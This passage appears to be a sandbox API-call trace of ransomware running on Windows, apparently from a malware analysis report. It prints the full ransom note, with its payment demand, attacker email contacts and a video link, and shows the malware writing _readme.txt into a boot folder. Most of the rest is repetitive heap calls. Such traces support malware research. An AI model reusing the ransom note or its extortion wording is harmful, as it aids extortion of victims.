e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.632] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.632] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\_readme.txt" (normalized: "c:\\boot\\pt-pt\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.632] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.632] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.632] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.632] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.633] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.633] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.633] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.633] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.633] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.635] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.635] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.635] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.635] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.635] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.635] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.635] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.635] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.635] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.635] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.635] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.635] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.636] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.636] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.636] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.636] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.636] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.636] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.636] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.636] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.636] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.636] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.636] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.639] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.639] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.639] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.639] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.639] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.639] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.639] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.639] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.639] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.639] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.639] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.641] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.641] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.641] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.641] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.641] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.641] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.641] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.641] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.641] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.641] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.641] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.641] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.641] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.641] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.641] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.641] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.641] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.641] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.641] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.641] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 